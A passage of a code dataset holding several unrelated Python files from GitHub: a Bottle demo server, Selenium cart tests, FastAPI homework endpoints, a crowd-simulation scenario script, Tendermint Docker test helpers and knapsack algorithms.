benz_main.fnget_recent_solutions(1)\n    #global tags\n    return \"\"\n\n\n@app.route('/current_question')\ndef current_question():\n    return {\"version\": version, \"img_url\":img_url}\n\n@app.route('/current_solution', method='POST')\ndef current_solution():\n    return \"\"\n\n@app.route('/feedback')\ndef feedback():\n    query_id = request.query.id\n    return \"\"\n\n@app.route('/lab_view')\ndef lab():\n    return {\"version\": lab_view}\n\n@app.route(\"/metrics\")\ndef metrics():\n    global lab_view\n    lab_view = \"1\"\n\n\n@app.route('/start')\ndef startn():\n    global questioni\n    questioni = request.query.search\n    increment_version()\n    return { \"start\" : \"I found a solution. I see that you have 2 of the 3 parts needed for the job in your bay. I have already requested for a fuel rail test cap and the part runner is on his way.\" , \"steps\":[\"Remove the valve cover and start the engine and let it idle. A small amount of white smoke is normal. If you don’t see smoke, one of the cylinders might be cracked\",\"You have to do a manual cylinder cut-off test to find the problematic cylinder\",\"One of your colleagues fixed a similar problem recently for the same engine. I can pull up his notes.\",\"This is what he did - Cap off the cylinders in the following sequence - 1, 3, 2 and 4. 
After capping off each cylinder, crank the engine and see if the crank time reduces to 3 to 5 seconds. If it does, you have found your leaking cylinder. If not, proceed to the next cylinder\"]}\n@app.route('/show')\ndef show():\n    global version\n    version = \"steps\"\n    return None\n# @app.route('/websocket')\n# def handle_websocket():\n#     wsock = request.environ.get('wsgi.websocket')\n#     if not wsock:\n#         abort(400, 'Expected WebSocket request.')\n#     while true:\n#         try:\n#             message = wsock.receive()\n#             message = {\"problem\" : \"you are the problem\", \"solution\": \"what can i do about that\", \"tags\":[\"version\",\"truck\",\"version\"]}\n#             wsock.send(dumps(message))\n#         except WebSocketError:\n#             break\n\nrun(app, host='172.30.0.163', port=8080, debug=True, reloader=True)\n\n","repo_name":"nithyarenga/daimler","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"26727103777","text":"import logging\n\nimport allure\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import NoSuchElementException\n\nfrom page.base_page import BasePage\n\ndelay = 3  # seconds\n\n\nclass CartPage(BasePage):\n    def __init__(self, driver):\n        super().__init__(driver)\n\n    empty_cart_text = \"There are no items in your cart.\"\n    remove_from_cart_button = (By.CSS_SELECTOR, \"[name=\\\"remove_cart_item\\\"]\")\n    cart_title = (By.CSS_SELECTOR, \"[class=\\\"cart wrapper\\\"] [class=\\\"card-title\\\"]\")\n    cart_text = (By.CSS_SELECTOR, \"[class=\\\"text-center\\\"]\")\n    unregistered_error_message = (By.CSS_SELECTOR, \"[class=\\\"error\\\"]\")\n    unregistered_error_no_first_name_text = \"Customer Details: You must enter a first name.\"\n    # unregistered_error_no_last_name_text = \"Customer Details: You must enter a last name.\"\n    # unregistered_error_no_address_text = \"Customer Details: You must enter an address.\"\n    # unregistered_error_no_city_text = \"Customer Details: You must enter a city.\"\n    # unregistered_error_no_email_text = \"Customer Details: You must enter an email address.\"\n    # unregistered_error_no_phone_text = \"Customer Details: You must enter a phone number.\"\n    # unregistered_error_no_post_code_text = \"Customer Details: You must enter a postcode.\"\n    # first_name_cart_input = (By.NAME, \"firstname\")\n    # last_name_cart_input = (By.NAME, \"lastname\")\n    # address1_cart_input = (By.NAME, \"address1\")\n    # city_cart_input = (By.NAME, \"city\")\n    # email_cart_input = (By.NAME, \"email\")\n    # phone_cart_input = (By.CSS_SELECTOR, \"[class=\\\"input-group\\\"] [name=\\\"phone\\\"]\")\n    # post_code_cart_input = (By.CSS_SELECTOR, \"[class=\\\"form-control\\\"][name=\\\"postcode\\\"]\")\n    save_changes_button = (By.CSS_SELECTOR, \"[name=\\\"save_customer_details\\\"][type='submit']\")\n\n    # agreement_check_box_shopping_form = (By.CSS_SELECTOR, \"[class=\\\"form-check\\\"][name=\\\"terms_agreed\\\"]\")\n\n    @allure.step(\"Clicking Remove from Cart button\")\n    def click_remove_from_cart_button(self):\n        logging.info('Clicking Remove from Cart button')\n        self.find(self.remove_from_cart_button).click()\n\n    @allure.step(\"Checking remove button is Visible\")\n    def if_remove_button_is_visible(self, driver):\n        logging.debug('Waiting for Cart title appeared')\n        WebDriverWait(driver, 
delay).until(EC.presence_of_element_located(CartPage.cart_title))\n logging.info('Checking remove button is Visible')\n self.find(self.remove_from_cart_button)\n\n @allure.step(\"Cleaning Cart\")\n def cleaning_cart(self, driver):\n logging.info('Cleaning Cart')\n try:\n CartPage.if_remove_button_is_visible(self, driver)\n CartPage.click_remove_from_cart_button(self)\n except NoSuchElementException:\n pass\n\n WebDriverWait(driver, delay).until(EC.presence_of_element_located(self.cart_text))\n logging.debug('Waiting empty cart text appeared')\n assert self.find(self.cart_text).text == self.empty_cart_text\n\n @allure.step(\"Getting unregistered error message text\")\n def get_unregistered_error_message_text(self):\n logging.info('Getting unregistered error message text')\n return self.find(self.unregistered_error_message).text\n\n @allure.step(\"Saving shopping cart changes\")\n def saving_shopping_cart_changes(self):\n logging.info('Saving shopping cart changes')\n self.find(self.save_changes_button).click()\n","repo_name":"LordScoutTG/Pytestfirst","sub_path":"page/cart_page.py","file_name":"cart_page.py","file_ext":"py","file_size_in_byte":3562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"71391481713","text":"\n# 5-14-22 Prior main file now called \"main_v1.py\" covers up to HW API 7\n# prior to being split into multiple files:\n# 1. main.py (new, simpler main file)\n# 2. sub files that are called by main.py: greetings.py, sums.py, maths.py\n\n\nfrom fastapi import FastAPI, HTTPException\nfrom pydantic import BaseModel\n\n\n# HTTPException from fastapi import HTTPException.\n# added the import of HTTPException from this article https://fastapi.tiangolo.com/tutorial/handling-errors/\n\napp = FastAPI()\n\n# START HOMEWORK APIs 5 6 7 ---------------------------------------------------------------------\n''' START REFERENCE URLS -------------------------\nNOTION https://www.notion.so/Api-Exercise-8c8c0119b01642c1a8b35e9f5bfecf8c\nhttps://fastapi.tiangolo.com/tutorial/body/\n--- END REFERENCE URLS --------------------------- \n'''\n# API 5: GET /api/v1/math/{operation}/{variable1}/(variable2} -> execute +,-,*,/ or return 404 if operation invalid\n# /api/v1/math/add/1/2\n@app.get(\"/api/v1/math/{operation}/{variable1}/{variable2}\")\nasync def PerformOperation5(operation: str,variable1: int,variable2: int):\n if operation == \"add\":\n ops=variable1+variable2\n return {\"ops\": ops}\n elif operation == \"sub\":\n ops = variable1 - variable2\n return {\"ops\": ops}\n elif operation == \"mult\":\n ops = variable1 * variable2\n return {\"ops\": ops}\n elif operation == \"div\":\n ops = variable1 / variable2\n return {\"ops\": ops}\n else:\n print(\"else branch\")\n raise HTTPException(status_code=404, detail=\"Item not found\")\n\n'''\nTo do later - create this endpoint with a dictionary -> \ndef add (X,Y):\n return X+Y\n def sub (X,Y):\n return X-Y\n def mult (X,Y):\n return X*Y\n def div (X,Y):\n return X/Y\n\n# I think I should use a dictionary here, but I need to relearn that - so using elif\n def OperationSelector(Ops, X, Y):\n if ops == \"add\":\n return add(X, Y)\n if ops == \"sub\":\n return sub(X, Y)\n if ops == \"mult\":\n return mult(X, Y)\n if ops == \"div\":\n return div(X, Y)\n else:\n return \"unknown operator - 404 error\"\n OperationSelector(operation,variable1,variable2)\n'''\n#return {test:\"testing api 5\"}\n\n\n#API 6: POST /api/v1/math/{operation} -> execute +,-,*,/ or return 404 if operation invalid\n# First 
POST, not a GET\n# /api/v1/math/add/1/2\n\n# following class taken from pydantic\nclass Item(BaseModel):\n variable1: int\n variable2: int\n\n'''\n@app.post(\"/trees/\")\nasync def create_trees(item: Item):\n return item\n@app.post(\"/api/v1/math/{operation}/items/\")\nasync def PerformOperation6(operation: str, item: Item):\nasync def PerformOperation6(item: Item):\n'''\n@app.post(\"/api/v1/math/{operation}\")\nasync def PerformOperation6(operation: str, item: Item):\n variable1: int = item.variable1\n variable2: int = item.variable2\n if operation == \"add\":\n ops=variable1+variable2\n return {\"ops\": ops}\n elif operation == \"sub\":\n ops = variable1 - variable2\n return {\"ops\": ops}\n elif operation == \"mult\":\n ops = variable1 * variable2\n return {\"ops\": ops}\n elif operation == \"div\":\n ops = variable1 / variable2\n return {\"ops\": ops}\n else:\n print(\"else branch\")\n raise HTTPException(status_code=404, detail=\"Item not found\")\n\n#API 7: GET /api/v1/hello?name=pradeep -> use query params\n# READ THE DOCS: https://fastapi.tiangolo.com/tutorial/query-params/\n@app.get(\"/api/v1/hello\")\n# use this URL to test: http://127.0.0.1:8000/api/v1/hello/?name=pradeep\nasync def QueryPass(name: str = \"World\"): # World is the default if no query param is passed\n return{\"greeting\":\"Hello \"+name+\"!\"}\n\n\n# END HOMEWORK APIs 5 6 7 -----------------------------------------------------------------------\n#\n#\n#\n\n# START PRADEEP LESSON - SIMPLE APIs -----------------------------------------------------------\n@app.get(\"/\")\nasync def root():\n return {\"message\": \"Running LessonAPI/main.py, just the slash\"}\n\n# API 1: GET /api/v1/ping -> return a pre-defined string\n@app.get(\"/api/v1/ping\")\nasync def ping():\n return {\"message from ping\": \"pong\"}\n# END PRADEEP LESSON - SIMPLE APIs ------------------------------------------------------------\n\n\n# START HOMEWORK -------------------------------------------------------------------------------\n\n''' START REFERENCE URLS -------------------------\nhttps://www.notion.so/Api-Exercise-8c8c0119b01642c1a8b35e9f5bfecf8c -> HW assignment\nhttps://fastapi.tiangolo.com/tutorial/path-params/ -> FastAPI Path Parameters\n--- END REFERENCE URLS --------------------------- \n'''\n\n# API 2: GET /api/v1/greeting -> return a pre-defined key-value pair\n@app.get(\"/api/v1/greeting\")\nasync def greeting():\n return {\"greeting\": \"Hello API 2\"}\n\n# API 3: GET /api/v1/greeting/pradeep -> input a path parameter and return a key-value pair using the parameter\n@app.get(\"/api/v1/greeting/{pradeep}\") # remember the brackets for a parameter\nasync def Var_Name(pradeep):\n return {\"greeting\": \"Hello API 3, this is \"+pradeep}\n\n# API 4: GET /api/v1/sum/1/1 --> input (2) path parameters, and them, and return the sum\n'''first try -- did not work because V1,V2 are strings, so operator + executed a \"concatenate\"\n@app.get(\"/api/v1/sum/{V1}/{V2}\")\nasync def sum(V1,V2):\n BIF = V1 + V2\n VAR1 = V1\n VAR2 = V2\n VAR3= sum\n print (VAR3)\n return {\"sum\":VAR3}\n'''\n# second try -- Q: did I need to force the int on the parameters in the method, or just the formula?\n@app.get(\"/api/v1/sum1/{V1}/{V2}\") # /sum1 forces parameters in 2 places - THIS WORKS\nasync def sum(V1: int,V2: int):\n VAR1=int(V1)\n VAR2=int(V2)\n # VAR3= sum --> remove this. 
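As the note on the first `/sum` attempt says, untyped path parameters arrive as strings, so `+` concatenates instead of adding; a quick framework-independent illustration of the failure and the fix:

```python
# Untyped values behave like the failing /sum endpoint: "1" + "1" concatenates.
assert "1" + "1" == "11"
# Declaring the parameter as int (or casting explicitly) restores arithmetic,
# which is what the /sum1..sum5 variants below demonstrate.
assert int("1") + int("1") == 2
```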
sum is a method above, we can't refer to a method from inside the method\n # print (VAR3)\n BIF=VAR1+VAR2\n print(BIF)\n return {\"Double forcing\":BIF}\n\n# second try continued -- several iterations to test ways to do the forcing\n@app.get(\"/api/v1/sum2/{V1}/{V2}\") # /sum2 no forcing is used - DOES NOT WORK, it concatenates V1 and V2\nasync def sum(V1,V2):\n VAR1=V1\n VAR2=V2\n BIF=VAR1+VAR2\n print(BIF)\n return {\"NO forcing\":BIF}\n\n@app.get(\"/api/v1/sum3/{V1}/{V2}\") # /sum3 forces parameters in the method definition only - THIS WORKS\nasync def sum(V1: int,V2: int):\n VAR1=V1\n VAR2=V2\n BIF=VAR1+VAR2\n print(BIF)\n return {\"Forcing in the method\":BIF}\n\n@app.get(\"/api/v1/sum4/{V1}/{V2}\") # /sum4 forces parameters in the VAR definitions only - THIS WORKS\nasync def sum(V1,V2):\n VAR1=int(V1)\n VAR2=int(V2)\n BIF=VAR1+VAR2\n print(BIF)\n return {\"forcing at the variables\":BIF}\n\n@app.get(\"/api/v1/sum5/{V1}/{V2}\") # /sum5 eliminates unnecessary variables, forces parameters in the formula - THIS WORKS\nasync def sum(V1,V2):\n BIF = int(V1) + int(V2)\n print(BIF)\n return {\"forcing in the forumula\":BIF}\n\n# END HOMEWORK ---------\n# -------------------------------------------------------------------------","repo_name":"bryanfinkel/LessonAPI","sub_path":"archive/main_v1.py","file_name":"main_v1.py","file_ext":"py","file_size_in_byte":6987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"11938982265","text":"import os\n\nimport task3.add_pedestrian as modify_scenario\n\nif __name__ == \"__main__\":\n \"\"\"\n Automatic creation of Corridor Scenario needed for task 4.5\n It assumes that the corridor is of 40x20 with a target id of 2\n \"\"\"\n num_pedestrian_to_generate = 100\n scenario_to_modify = os.getcwd() + \"\\\\task4.5\\\\scenarios\\\\task4.5_2.scenario\"\n for i in range(num_pedestrian_to_generate):\n modify_scenario.add_pedestrian(\n id=num_pedestrian_to_generate + i,\n scenario_path=scenario_to_modify,\n out_scen_name=\"task4.5_2\",\n output_path=scenario_to_modify,\n position=(i // 20, i % 20), # to correctly position pedestrians starting from the left\n targetIds=[2],\n groupIds=[0] # infected\n )\n","repo_name":"AlexPasqua/MLCMS-exercises","sub_path":"EX2/task4/create_scenario_task4.5_2.py","file_name":"create_scenario_task4.5_2.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"24007018814","text":"import logging\nimport os\nimport subprocess # nosec\nimport time\nfrom pathlib import Path\nfrom typing import Any, Dict, List\n\nimport docker\nimport pytest\nfrom aea_test_autonomy.configurations import (\n TENDERMINT_IMAGE_NAME,\n TENDERMINT_IMAGE_VERSION,\n)\nfrom aea_test_autonomy.docker.base import DockerImage\nfrom aea_test_autonomy.helpers.base import tendermint_health_check\nfrom docker.models.containers import Container\n\n\n_TCP = \"tcp://\"\n_HTTP = \"http://\"\n_LOCAL_ADDRESS = \"0.0.0.0\" # nosec\n\nDEFAULT_TENDERMINT_PORT = 26657\nDEFAULT_P2P_PORT = 26656\nDEFAULT_TENDERMINT_COM_PORT = 8080\nDEFAULT_ABCI_PORT = 26658\n# we need this because we want to connect from the Tendermint\n# Docker container to the ABCI server that lives in the host\nDEFAULT_ABCI_HOST = \"host.docker.internal\"\n\n_SLEEP_TIME = 1\n\n\nclass TendermintDockerImage(DockerImage):\n \"\"\"Tendermint Docker image.\"\"\"\n\n use_grpc: bool = False\n\n def __init__( # pylint: disable=too-many-arguments\n self,\n client: 
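For the pedestrian-placement script above, the `(i // 20, i % 20)` expression fills the corridor column by column: the second coordinate cycles through 0..19 while the first advances every 20 pedestrians. A quick check of the pattern:

```python
positions = [(i // 20, i % 20) for i in range(21)]
assert positions[0] == (0, 0)    # first pedestrian
assert positions[19] == (0, 19)  # last pedestrian of the first batch of 20
assert positions[20] == (1, 0)   # wraps to the next x after 20 pedestrians
```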
docker.DockerClient,\n abci_host: str = DEFAULT_ABCI_HOST,\n abci_port: int = DEFAULT_ABCI_PORT,\n port: int = DEFAULT_TENDERMINT_PORT,\n p2p_port: int = DEFAULT_P2P_PORT,\n com_port: int = DEFAULT_TENDERMINT_COM_PORT,\n ):\n \"\"\"Initialize.\"\"\"\n super().__init__(client)\n self.abci_host = abci_host\n self.abci_port = abci_port\n self.port = port\n self.p2p_port = p2p_port\n self.com_port = com_port\n self.proxy_app = f\"{_TCP}{self.abci_host}:{self.abci_port}\"\n\n @property\n def image(self) -> str:\n \"\"\"Get the image name.\"\"\"\n return \"tendermint/tendermint:v0.34.19\"\n\n def _build_command(self) -> List[str]:\n \"\"\"Build command.\"\"\"\n\n abci = \"grpc\" if self.use_grpc else \"socket\"\n cmd = [\"node\", f\"--abci={abci}\", f\"--proxy_app={self.proxy_app}\"]\n logging.info(f\"TendermintDockerImage: {cmd}\")\n\n return cmd\n\n def create(self) -> Container:\n \"\"\"Create the container.\"\"\"\n cmd = self._build_command()\n if self.abci_host == DEFAULT_ABCI_HOST:\n extra_hosts_config = {self.abci_host: \"host-gateway\"}\n else:\n extra_hosts_config = {}\n container = self._client.containers.run(\n self.image,\n command=cmd,\n detach=True,\n network=\"host\",\n extra_hosts=extra_hosts_config,\n )\n return container\n\n def create_many(self, nb_containers: int) -> List[Container]:\n \"\"\"Instantiate the image in many containers, parametrized.\"\"\"\n raise NotImplementedError()\n\n def wait(self, max_attempts: int = 15, sleep_rate: float = 1.0) -> bool:\n \"\"\"\n Wait until the image is running.\n\n :param max_attempts: max number of attempts.\n :param sleep_rate: the amount of time to sleep between different requests.\n :return: True if the wait was successful, False otherwise.\n \"\"\"\n time.sleep(_SLEEP_TIME)\n return True\n\n\nclass FlaskTendermintDockerImage(TendermintDockerImage):\n \"\"\"Flask app with Tendermint Docker image.\"\"\"\n\n _extra_hosts: Dict[str, str]\n\n def __init__( # pylint: disable=too-many-arguments,useless-super-delegation\n self,\n client: docker.DockerClient,\n abci_host: str = DEFAULT_ABCI_HOST,\n abci_port: int = DEFAULT_ABCI_PORT,\n port: int = DEFAULT_TENDERMINT_PORT,\n p2p_port: int = DEFAULT_P2P_PORT,\n com_port: int = DEFAULT_TENDERMINT_COM_PORT + 2,\n ):\n \"\"\"Initialize.\"\"\"\n super().__init__(client, abci_host, abci_port, port, p2p_port, com_port)\n\n @property\n def image(self) -> str:\n \"\"\"Get the image name.\"\"\"\n return f\"{TENDERMINT_IMAGE_NAME}:{TENDERMINT_IMAGE_VERSION}\"\n\n @staticmethod\n def get_node_name(i: int) -> str:\n \"\"\"Get the ith node's name.\"\"\"\n return f\"node{i}\"\n\n def _get_node_id(self, i: int) -> str:\n \"\"\"Get the node id.\"\"\"\n cmd = [\n \"docker\",\n \"exec\",\n self.get_node_name(i),\n \"tendermint\",\n \"--home\",\n self.get_node_name(i),\n \"show-node-id\",\n ]\n process = subprocess.Popen( # nosec # pylint: disable=consider-using-with\n cmd,\n stdout=subprocess.PIPE,\n )\n output, _ = process.communicate()\n node_id = output.decode().strip()\n return node_id\n\n @staticmethod\n def __increment_port(port: int, i: int) -> int:\n \"\"\"Increment a port\"\"\"\n return port + i * 10\n\n def get_port(self, i: int) -> int:\n \"\"\"Get the ith port.\"\"\"\n return self.__increment_port(self.port, i)\n\n def get_com_port(self, i: int) -> int:\n \"\"\"Get the ith com port.\"\"\"\n return self.__increment_port(self.com_port, i)\n\n def get_p2p_port(self, i: int) -> int:\n \"\"\"Get the ith p2p port.\"\"\"\n return self.__increment_port(self.p2p_port, i)\n\n def get_abci_port(self, i: int) 
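`_get_node_id` below drives `Popen`/`communicate` by hand; a hedged sketch of the same call using `subprocess.run` (Python 3.7+), which captures and decodes the output in one step — the helper name is illustrative:

```python
import subprocess

def show_node_id(node_name: str) -> str:
    result = subprocess.run(  # nosec - same docker exec call as in _get_node_id
        ["docker", "exec", node_name, "tendermint", "--home", node_name, "show-node-id"],
        capture_output=True, text=True, check=True,
    )
    return result.stdout.strip()
```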
-> int:\n \"\"\"Get the ith abci port.\"\"\"\n return self.__increment_port(self.abci_port, i)\n\n def get_addr(self, prefix: str, i: int, p2p: bool = False) -> str:\n \"\"\"Get a node's address.\"\"\"\n valid_prefixes = {_TCP, _HTTP}\n if prefix not in valid_prefixes:\n raise ValueError(f\"Invalid prefix! Should be one of: {valid_prefixes}\")\n\n if p2p:\n prefix += self._get_node_id(i) + \"@\"\n port = self.get_p2p_port(i)\n else:\n port = self.get_port(i)\n\n return f\"{prefix}{_LOCAL_ADDRESS}:{port}\"\n\n @property\n def p2p_seeds(self) -> List[str]:\n \"\"\"Get p2p seeds.\"\"\"\n if self.nb_nodes is None:\n raise ValueError(\"Trying to get p2p seeds before initializing containers!\")\n\n return [self.get_addr(_TCP, i) for i in range(self.nb_nodes)]\n\n def _build_command(self) -> List[str]:\n \"\"\"Build command.\"\"\"\n return [\"run\", \"--no-reload\", f\"--host={_LOCAL_ADDRESS}\", \"--port=8080\"]\n\n def _create_one(self, i: int) -> Container:\n \"\"\"Create a node container.\"\"\"\n\n name = self.get_node_name(i)\n extra_hosts = (\n {self.abci_host: \"host-gateway\"}\n if self.abci_host == DEFAULT_ABCI_HOST\n else {}\n )\n extra_hosts.update(self._extra_hosts)\n\n proxy_app = f\"{_TCP}{self.abci_host}:{self.get_abci_port(i)}\"\n\n run_kwargs = dict(\n image=self.image,\n command=self._build_command(),\n name=name,\n hostname=name,\n detach=True,\n mem_limit=\"1024m\",\n mem_reservation=\"256M\",\n environment={\n \"ID\": i,\n \"PROXY_APP\": proxy_app,\n \"TMHOME\": f\"/tendermint/{name}\",\n \"CREATE_EMPTY_BLOCKS\": \"true\",\n \"DEV_MODE\": \"1\",\n \"LOG_FILE\": f\"/logs/{name}.txt\",\n \"USE_GRPC\": (\"false\", \"true\")[self.use_grpc],\n },\n working_dir=\"/tendermint\",\n volumes=[\n f\"{os.getcwd()}/nodes:/tendermint:Z\",\n f\"{os.getcwd()}/logs:/logs:Z\",\n f\"{os.getcwd()}/tm_state:/tm_state:Z\",\n ],\n ports={\n f\"{DEFAULT_TENDERMINT_PORT}/tcp\": (\n _LOCAL_ADDRESS, # nosec,\n self.get_port(i),\n ),\n f\"{DEFAULT_TENDERMINT_COM_PORT}/tcp\": (\n _LOCAL_ADDRESS, # nosec,\n self.get_com_port(i),\n ),\n f\"{DEFAULT_P2P_PORT}/tcp\": (\n _LOCAL_ADDRESS, # nosec,\n self.get_p2p_port(i),\n ),\n },\n extra_hosts=extra_hosts,\n )\n container = self._client.containers.run(**run_kwargs)\n return container\n\n def _fix_persistent_peers(self) -> None: # pylint: disable=too-many-locals\n \"\"\"\n Fix the persistent peers' ports in the configuration file.\n\n Since we are running all the ABCIs at the same host for our e2e tests, we shift the ports by 10 for each\n added node. 
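Concretely, the `__increment_port` scheme used throughout this class gives node `i` its base port plus `10 * i`:

```python
def shifted_port(base: int, i: int) -> int:
    return base + i * 10

# RPC ports for four local nodes, starting from the Tendermint default 26657:
assert [shifted_port(26657, i) for i in range(4)] == [26657, 26667, 26677, 26687]
```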
Therefore, we need to override the default persistent peers in the config files,\n in order for them to use the correct ports.\n \"\"\"\n replace_cmd = \"\"\n for node_num in range(self.nb_nodes):\n preconfigured_endpoint = f\"node{node_num}:{DEFAULT_P2P_PORT}\"\n correct_endpoint = f\"node{node_num}:{self.get_p2p_port(node_num)}\"\n if replace_cmd != \"\":\n replace_cmd += \" && \"\n replace_cmd += f\"sed -i 's/{preconfigured_endpoint}/{correct_endpoint}/g' /tendermint/node*/config/config.toml\"\n cmd = [\n \"docker\",\n \"run\",\n \"--rm\",\n \"-v\",\n f\"{os.getcwd()}/nodes:/tendermint:Z\",\n \"--entrypoint=/bin/bash\",\n self.image,\n \"-c\",\n replace_cmd,\n ]\n subprocess.run(cmd) # nosec # pylint: disable=subprocess-run-check\n\n def _grant_permissions(self) -> None:\n \"\"\"\n Grant permissions for the nodes' config files.\n\n Create the nodes' config files, so that the `testnet` command which is run via docker\n does not create it with root permissions, so we can later modify the `config.toml` files.\n \"\"\"\n for i in range(self.nb_nodes):\n path = Path(f\"{os.getcwd()}\", \"nodes\", f\"node{i}\", \"config\")\n os.makedirs(path)\n open( # pylint: disable=consider-using-with,unspecified-encoding\n path / \"config.toml\", \"a\"\n ).close()\n\n def _create_testnet(self) -> None:\n \"\"\"Create the Tendermint testnet.\"\"\"\n cmd = [\n \"docker\",\n \"run\",\n \"--rm\",\n \"-v\",\n f\"{os.getcwd()}/nodes:/tendermint:Z\",\n \"--entrypoint=/usr/bin/tendermint\",\n self.image,\n \"testnet\",\n \"--config\",\n \"/etc/tendermint/config-template.toml\",\n \"--v\",\n f\"{self.nb_nodes}\",\n \"--o\",\n \"/tendermint/\",\n ]\n for i in range(self.nb_nodes):\n cmd.append(f\"--hostname=node{i}\")\n\n subprocess.run(cmd) # nosec # pylint: disable=subprocess-run-check\n\n def _create_config(self, nb_nodes: int) -> None:\n \"\"\"Create necessary configuration.\"\"\"\n self.nb_nodes = nb_nodes # pylint: disable=attribute-defined-outside-init\n self._grant_permissions()\n self._create_testnet()\n self._fix_persistent_peers()\n self._extra_hosts = {\n self.get_node_name(i): \"host-gateway\" for i in range(nb_nodes)\n }\n\n def create_many(self, nb_containers: int) -> List[Container]:\n \"\"\"Create a list of node containers.\"\"\"\n self._create_config(nb_containers)\n containers = [self._create_one(i) for i in range(nb_containers)]\n return containers\n\n def health_check(self, **kwargs: Any) -> None:\n \"\"\"Do a health-check of the Tendermint network.\"\"\"\n http_rpc_laddresses = [self.get_addr(_HTTP, i) for i in range(self.nb_nodes)]\n for http_rpc_laddr in http_rpc_laddresses:\n if not tendermint_health_check(http_rpc_laddr, **kwargs):\n pytest.fail(\n f\"Tendermint node {http_rpc_laddr} did not pass health-check\"\n )\n\n @staticmethod\n def cleanup(nb_containers: int) -> None:\n \"\"\"Cleanup dangling containers.\"\"\"\n cmd = [\n \"docker\",\n \"rm\",\n ]\n for i in range(nb_containers):\n cmd.append(FlaskTendermintDockerImage.get_node_name(i))\n\n # this will get rid of the containers even if they are healthy\n cmd.append(\"--force\")\n subprocess.run(cmd) # nosec # pylint: disable=subprocess-run-check\n","repo_name":"valory-xyz/open-autonomy","sub_path":"plugins/aea-test-autonomy/aea_test_autonomy/docker/tendermint.py","file_name":"tendermint.py","file_ext":"py","file_size_in_byte":11901,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"39"} +{"seq_id":"6739769001","text":"from typing import *\n\n# Versión recursiva directa\nfrom 
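To see what the `sed` command assembled in `_fix_persistent_peers` does, here is the same endpoint rewrite applied to a sample config line in pure Python (the node names and default P2P port 26656 come from the docstring above; the line content is made up):

```python
line = 'persistent_peers = "abc@node0:26656,def@node1:26656"'
for i in range(2):
    line = line.replace(f"node{i}:26656", f"node{i}:{26656 + i * 10}")
# node0 keeps the default port, node1 is shifted by 10:
assert line == 'persistent_peers = "abc@node0:26656,def@node1:26666"'
```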
Utils.bt_scheme import infinity\n\n\ndef mochila_rec(v: List[int], w: List[int], W: int) -> int:\n def B(n: int, c: int) -> int:\n if n == 0:\n return 0\n if w[n - 1] <= c:\n return max(B(n - 1, c), B(n - 1, c - w[n - 1]) + v[n - 1])\n else:\n return B(n - 1, c)\n\n N = len(v)\n return B(N, W)\n\n\n# Versión recursiva con memoización\ndef mochila_rec_mem(v: List[int], w: List[int], W: int) -> int:\n def B(n: int, c: int) -> int:\n if n == 0:\n return 0\n if (n, c) not in mem:\n if w[n - 1] <= c:\n mem[n, c] = max(B(n - 1, c), B(n - 1, c - w[n - 1]) + v[n - 1])\n else:\n mem[n, c] = B(n - 1, c)\n\n return mem[n, c]\n\n N = len(v)\n mem = {}\n return B(N, W)\n\n\n# Versión recursiva con memorización y recuperación de camino\ndef mochila_rec_mem_camino(v: List[int], w: List[int], W: int) -> Tuple[int, List[int]]:\n def B(n: int, c: int) -> int:\n if n == 0:\n return 0\n if (n, c) not in mem:\n if w[n - 1] <= c:\n mem[n, c] = max((B(n - 1, c), (n - 1, c, 0)),\n (B(n - 1, c - w[n - 1]) + v[n - 1], (n - 1, c - w[n - 1], 1)))\n else:\n mem[n, c] = B(n - 1, c), (n - 1, c, 0)\n return mem[n, c][0]\n\n N = len(v)\n mem = {}\n score = B(N, W)\n sol = []\n n, q = N, W\n while n != 0:\n _, (nPrev, qPrev, i) = mem[n, q]\n sol.append(i)\n q, n = qPrev, nPrev\n sol.reverse()\n return score, sol\n\n\n# Versión iterativa con recuperación de camino\ndef mochila_iter_camino(v: List[int], w: List[int], W: int) -> Tuple[int, List[int]]:\n mem = {}\n N = len(v) # número de objetos\n\n for c in range(W + 1):\n mem[0, c] = 0, []\n\n for n in range(1, N + 1):\n for c in range(W + 1):\n if w[n - 1] <= c:\n mem[n, c] = max((mem[n - 1, c][0], (n - 1, c, 0)),\n (mem[n - 1, c - w[n - 1]][0] + v[n - 1], (n - 1, c - w[n - 1], 1)))\n else:\n mem[n, c] = mem[n - 1, c][0], (n - 1, c, 0)\n\n score = mem[N, W][0]\n sol = []\n\n while n != 0:\n _, (nPrev, cPrev, i) = mem[n, c]\n sol.append(i)\n n, c = nPrev, cPrev\n sol.reverse()\n return score, sol\n\n\n# Versión iterativa con reduccion del coste espacial\n\ndef mochila_iter_reduccion_coste(v: List[int], w: List[int], W: int) -> int:\n N = len(v) # número de objetos\n current = [0] * (W + 1)\n previous = [0] * (W + 1)\n for n in range(1, N + 1):\n previous, current = current, previous\n for c in range(W + 1):\n if w[n - 1] <= c:\n current[c] = max(previous[c],\n previous[c - w[n - 1]] + v[n - 1])\n else:\n current[c] = previous[c]\n\n return current[W]\n\n\n# PROGRAMA PRINCIPAL -------------------------------------------------------------------------\nif __name__ == \"__main__\":\n values = [90, 75, 60, 20, 10]\n weights = [4, 3, 3, 2, 2]\n capacity = 6\n\n print(\"Versión recursiva:\")\n print(mochila_rec(values, weights, capacity))\n print()\n print(\"Versión recursiva con memoización:\")\n print(mochila_rec_mem(values, weights, capacity))\n print()\n print(\"Versión recursiva con memoización y recuperación de camino:\")\n print(mochila_rec_mem_camino(values, weights, capacity))\n print()\n print(\"Versión iterativa con recuperación de camino:\")\n print(mochila_iter_camino(values, weights, capacity))\n print()\n print(\"Versión iterativa con reduccion del coste espacial:\")\n print(mochila_iter_reduccion_coste(values, weights, capacity))\n","repo_name":"Abensab/EI1022-Algoritmia","sub_path":"8_Session/sesion_8_mochila.py","file_name":"sesion_8_mochila.py","file_ext":"py","file_size_in_byte":3784,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} 